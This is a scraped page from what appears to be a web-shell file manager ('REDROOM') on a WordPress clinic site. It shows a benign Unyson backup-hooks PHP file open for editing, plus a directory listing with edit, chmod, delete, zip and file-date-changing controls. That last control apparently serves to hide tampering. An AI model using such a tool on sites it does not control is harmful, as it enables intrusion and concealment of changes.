REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 1.35 KB
Close
/home/nshryvcy/radiantskinclinics.org/wp-content/plugins/unyson/framework/extensions/backups/hooks.php
Text
Base64
<?php if (!defined('FW')) die('Forbidden'); /** * @param bool $exclude * @param string $option_name * @param bool $is_full_backup * * @return bool */ function _filter_fw_ext_backups_db_export_exclude_option($exclude, $option_name, $is_full_backup) { foreach (array( '_site_transient_', '_transient_' ) as $option_prefix) { if (substr($option_name, 0, strlen($option_prefix)) === $option_prefix) { return true; } } return $exclude; } add_filter('fw_ext_backups_db_export_exclude_option', '_filter_fw_ext_backups_db_export_exclude_option', 10, 3); /** * Other extensions options */ { function _filter_fw_ext_backups_db_export_exclude_other_extensions_options($exclude, $option_name, $is_full_backup) { if (!$is_full_backup) { if ($option_name === 'fw_ext_settings_options:mailer') { return true; } } return $exclude; } add_filter('fw_ext_backups_db_export_exclude_option', '_filter_fw_ext_backups_db_export_exclude_other_extensions_options', 10, 3 ); function _filter_fw_ext_backups_db_restore_keep_other_extensions_options($options, $is_full) { if (!$is_full) { $options[ 'fw_ext_settings_options:mailer' ] = true; } return $options; } add_filter('fw_ext_backups_db_restore_keep_options', '_filter_fw_ext_backups_db_restore_keep_other_extensions_options', 10, 2 ); }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 5 × Files: 6
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
cli
DIR
-
drwxr-xr-x
2026-02-23 02:01:24
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
extensions
DIR
-
drwxr-xr-x
2026-02-23 02:01:24
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
includes
DIR
-
drwxr-xr-x
2026-02-23 02:01:24
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
static
DIR
-
drwxr-xr-x
2026-02-23 02:01:24
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
views
DIR
-
drwxr-xr-x
2026-02-23 02:01:24
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
.htaccess
205 B
lr--r--r--
2026-02-23 02:01:24
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
class-fw-extension-backups.php
17.61 KB
lrw-r--r--
2025-04-07 05:23:45
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
config.php
2.42 KB
lrw-r--r--
2025-04-07 05:23:45
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
helpers.php
7.72 KB
lrw-r--r--
2025-04-07 05:23:45
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
hooks.php
1.35 KB
lrw-r--r--
2025-04-07 05:23:45
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
manifest.php
872 B
lrw-r--r--
2025-04-07 05:23:45
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).